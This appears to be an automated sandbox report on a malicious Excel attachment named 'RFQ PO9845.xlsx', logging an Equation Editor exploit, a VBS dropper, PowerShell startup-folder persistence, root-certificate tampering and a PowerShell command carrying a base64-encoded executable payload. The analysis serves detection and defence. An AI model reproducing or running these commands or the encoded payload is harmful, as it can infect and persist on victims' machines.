oSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcvsAAHAXKEoAAAYoKwAACgxyBQEAcBsoSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyEQEAcBwoSgAABm8xAAAKEQVyhQEAcB0oSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL3AQBwFihKAAAGF283AAAKDRk4mP3//wlvOAAACnJTAgBwHShKAAAGKAIAACstEglyUwIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcl0CAHAWKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyBQEAcBsoSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcmECAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyawIAcBsoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcm8CAHAZKEoAAAZvMQAAChEJcuMCAHAbKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01CAACEE AdjustTokenPrivileges,11_2_01CAACEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01CAACB7 AdjustTokenPrivileges,11_2_01CAACB7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ PO9845.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR587B.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/7@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: RFQ PO9845.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/worksheets/_rels/sheet4.xml.rels
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
Source: RFQ PO9845.xlsxInitial sample: OLE zip file path = xl/embeddings/oleObject1.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: RFQ PO9845.xlsxStatic file information: File size 3672062 > 1048576
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1134194116.00000000058CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb< source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\CryptersAndTools\Desktop\Rump Offline new\bin\Release\obfuscated\Fiber.pdb source: powershell.exe, 0000000B.00000002.1130374733.00000000034DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1134118287.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1130374733.000000000308C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb' source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb] source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.3380.5597612ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 0000000B.00000002.1129822527.00000000006E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: RFQ PO9845.xlsxInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyUAAApyMQAAcBYoSgAABnI/AABwHihKAAAGbyUAAApyQwAAcBcoSgAABnJPAABwHShKAAAGbyUAAApyUwAAcBYoSgAABnJfAABwHChKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwGihKAAAGbyUAAApyeQAAcBooSgAABnKLAABwHihKAAAGbyUAAApyjwAAcBwoSgAABnKhAABwHChKAAAGbyUAAApypQAAcBooSgAABnKxAABwFyhKAAAGbyUAAApytQAAcB4oSgAABnLHAABwFyhKAAAGbyUAAApyywAAcBkoSgAABnLdAABwGyhKAAAGbyUAAApy4QAAcBcoSgAABnLzAABwGChKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNysQAAcBcoSgAABhYoKAAACjoEAQAAHxooKQAACiVy9wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcvsAAHAXKEoAAAYoKwAACgxyBQEAcBsoSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyEQEAcBwoSgAABm8xAAAKEQVyhQEAcB0oSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL3AQBwFihKAAAGF283AAAKDRk4mP3//wlvOAAACnJTAgBwHShKAAAGKAIAACstEglyUwIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcl0CAHAWKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyBQEAcBsoSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcmECAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyawIAcBsoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcm8CAHAZKEoAAAZvMQAAChEJcuMCAHAbKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCA
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyUAAApyMQAAcBYoSgAABnI/AABwHihKAAAGbyUAAApyQwAAcBcoSgAABnJPAABwHShKAAAGbyUAAApyUwAAcBYoSgAABnJfAABwHChKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwGihKAAAGbyUAAApyeQAAcBooSgAABnKLAABwHihKAAAGbyUAAApyjwAAcBwoSgAABnKhAABwHChKAAAGbyUAAApypQAAcBooSgAABnKxAABwFyhKAAAGbyUAAApytQAAcB4oSgAABnLHAABwFyhKAAAGbyUAAApyywAAcBkoSgAABnLdAABwGyhKAAAGbyUAAApy4QAAcBcoSgAABnLzAABwGChKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNysQAAcBcoSgAABhYoKAAACjoEAQAAHxooKQAACiVy9wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcvsAAHAXKEoAAAYoKwAACgxyBQEAcBsoSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyEQEAcBwoSgAABm8xAAAKEQVyhQEAcB0oSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL3AQBwFihKAAAGF283AAAKDRk4mP3//wlvOAAACnJTAgBwHShKAAAGKAIAACstEglyUwIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcl0CAHAWKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyBQEAcBsoSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcmECAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyawIAcBsoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcm8CAHAZKEoAAAZvMQAAChEJcuMCAHAbKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_039860B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_039860B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
